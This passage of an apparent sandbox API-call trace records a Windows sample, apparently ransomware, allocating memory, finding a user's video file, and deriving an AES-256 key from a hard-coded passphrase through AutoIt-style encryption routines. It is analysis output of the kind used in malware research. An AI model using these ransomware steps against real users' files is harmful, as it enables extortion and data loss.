returned 0x43ca550 [0098.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0098.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0098.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0098.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0098.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0098.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0098.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0098.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0098.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0098.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0098.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0098.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0098.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0098.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0098.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0098.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0098.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0098.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0098.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0098.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0098.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0098.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0098.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0098.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0098.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0098.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0098.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0098.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0098.730] FreeLibrary (hLibModule=0x772d0000) returned 1 [0098.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0098.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0098.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0098.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0098.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0098.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0098.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0098.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0098.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0098.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0098.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0098.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0098.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0098.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0098.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0098.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0098.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0098.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0098.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0098.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0098.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0098.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0098.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0098.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0098.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0098.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0098.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0098.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0098.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0098.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0098.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0098.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0098.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0098.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0098.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0098.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0098.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0098.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0098.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0098.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0098.732] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0098.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0098.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0098.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0098.732] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0098.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0098.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0098.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0098.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0098.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0098.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0098.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0098.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0098.733] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0098.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0098.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0098.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0098.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0098.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0098.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0098.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0098.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0098.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0098.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0098.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0098.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0098.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0098.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0098.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0098.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0098.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0098.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0098.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0098.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0098.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0098.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0098.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0098.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0098.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0098.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0098.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0098.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0098.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0098.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0098.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0098.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0098.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0098.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0098.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0098.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0098.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0098.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0098.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0098.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0098.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0098.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0098.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0098.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0098.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0098.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0098.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0098.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0098.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0098.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0098.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0098.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0098.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0098.735] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9ed8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0098.735] CloseHandle (hObject=0x298) returned 1 [0098.736] FreeLibrary (hLibModule=0x772d0000) returned 1 [0098.736] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0098.736] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\F0zOuSSpVPNmctC-N.swf", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2b66ed0, ftCreationTime.dwHighDateTime=0x1d5eb9f, ftLastAccessTime.dwLowDateTime=0xeebbe170, ftLastAccessTime.dwHighDateTime=0x1d5e7a8, ftLastWriteTime.dwLowDateTime=0xeebbe170, ftLastWriteTime.dwHighDateTime=0x1d5e7a8, nFileSizeHigh=0x0, nFileSizeLow=0xcaef, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="F0zOuSSpVPNmctC-N.swf", cAlternateFileName="F0ZOUS~1.SWF")) returned 0x41ac140 [0098.736] FindClose (in: hFindFile=0x41ac140 | out: hFindFile=0x41ac140) returned 1 [0098.736] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0098.736] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0098.736] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0098.737] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.737] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0098.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797088, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0098.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0098.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0098.737] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5250) returned 1 [0098.738] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0098.738] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0098.738] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0098.738] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0098.738] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0098.738] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0098.738] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.738] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0098.738] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0098.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca688, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0098.738] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0098.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0098.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2728, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0098.739] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0098.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0098.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0098.739] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.739] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0098.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca580, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0098.739] CryptHashData (hHash=0x41ac540, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0098.739] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.739] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0098.739] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0098.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca490, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0098.739] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac540, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac740) returned 1 [0098.740] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.740] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0098.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796ea8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0098.740] CryptDestroyHash (hHash=0x41ac540) returned 1 [0098.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0098.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0098.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0098.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0098.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0098.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0098.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0098.740] RtlAllocateHeap 